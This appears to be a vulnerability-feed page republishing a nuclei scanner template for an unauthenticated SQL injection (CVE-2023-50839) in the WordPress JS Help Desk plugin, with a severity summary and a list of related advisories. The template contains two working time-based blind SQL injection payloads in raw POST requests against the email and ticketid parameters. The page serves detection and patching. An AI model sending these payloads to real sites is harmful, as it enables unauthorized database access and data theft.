JS Help Desk <= 2.8.1 - SQL Injection

04 Jul 2026 03:00:48 | Reported by ProjectDiscovery | Type: nuclei | Source: github.com

SQL injection in JS Help Desk up to 2.8.1 via the email and trackingid parameters is exploitable by unauthenticated attackers; fixed in 2.8.2.

Related

| Reporter | Title | Published | Family |
|---|---|---|---|
| ATTACKERKB | CVE-2023-7337 | 4 Mar 2026 09:24 | attackerkb |
| Circl | CVE-2023-50839 | 20 Jan 2024 15:17 | circl |
| CNNVD | WordPress Plugin JS Help Desk SQL Injection Vulnerability | 28 Dec 2023 00:00 | cnnvd |
| CVE | CVE-2023-50839 | 28 Dec 2023 20:02 | cve |
| Cvelist | CVE-2023-50839 WordPress JS Help Desk – Best Help Desk & Support Plugin <= 2.8.1 is vulnerable to SQL Injection | 28 Dec 2023 20:02 | cvelist |
| EUVD | EUVD-2023-55572 | 3 Oct 2025 20:07 | euvd |
| EUVD | EUVD-2023-60537 | 4 Mar 2026 12:30 | euvd |
| NVD | CVE-2023-50839 | 28 Dec 2023 20:16 | nvd |
| OSV | CVE-2023-50839 | 28 Dec 2023 20:16 | osv |
| Patchstack | WordPress JS Help Desk – Best Help Desk & Support Plugin Plugin <= 2.8.1 is vulnerable to SQL Injection | 21 Dec 2023 00:00 | patchstack |

id: CVE-2023-50839

info:
  name: JS Help Desk <= 2.8.1 - SQL Injection
  author: Shivam Kamboj
  severity: critical
  description: |
    The JS Help Desk – Best Help Desk & Support Plugin plugin for WordPress is vulnerable to SQL Injection via the 'email' and 'trackingid' parameters in all versions up to 2.8.2 (exclusive) due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
  impact: |
    Attackers can execute arbitrary SQL commands, potentially leading to data theft, data tampering, or database compromise.
  remediation: |
    Update to the latest version of JS Help Desk, version 2.8.2 or later.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2023-50839
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/js-support-ticket/js-help-desk-281-unauthenticated-sql-injection-via-email-and-trackingid
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-50839
    epss-score: 0.02041
    epss-percentile: 0.78804
    cwe-id: CWE-89
  metadata:
    verified: true
    max-request: 1
  tags: cve,cve2023,wordpress,wp,wp-plugin,sqli,js-support-ticket,unauth

flow: http(1) || http(2)

http:
  - raw:
      - |
        @timeout: 20s
        POST /js-support-ticket-controlpanel/ HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36

        form_request=jssupportticket&jstmod=ticket&task=showticketstatus&[email protected]' AND SLEEP(8)-- -&ticketid=test123

    matchers:
      - type: dsl
        dsl:
          - 'duration >= 8'
          - 'status_code == 302'
          - 'len(body) == 0'
          - 'contains(content_type, "text/html")'
        condition: and

  - raw:
      - |
        @timeout: 20s
        POST /js-support-ticket-controlpanel/ HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36

        form_request=jssupportticket&jstmod=ticket&task=showticketstatus&[email protected]&ticketid=1'+AND+(SELECT+1+FROM+(SELECT+SLEEP(8))x)--+-

    matchers:
      - type: dsl
        dsl:
          - 'duration >= 8'
          - 'status_code == 302'
          - 'len(body) == 0'
          - 'contains(content_type, "text/html")'
        condition: and
# digest: 4a0a00473045022100cb9dd73cc5a993d03923faea22eb4633649075a13e462fb0b952ebedba1bf8cb022015929a7d9ba6a37234408802a41ab44f015291513e62dcea9e9fe3937bf356b3:922c64590222798bb761d5b6d8e72950

Scores as of 20 Feb 2026 11:58 (current):
Vulners AI Score: 7.2 (High risk)
CVSS 3.1: 9.3 - 9.8
EPSS: 0.02041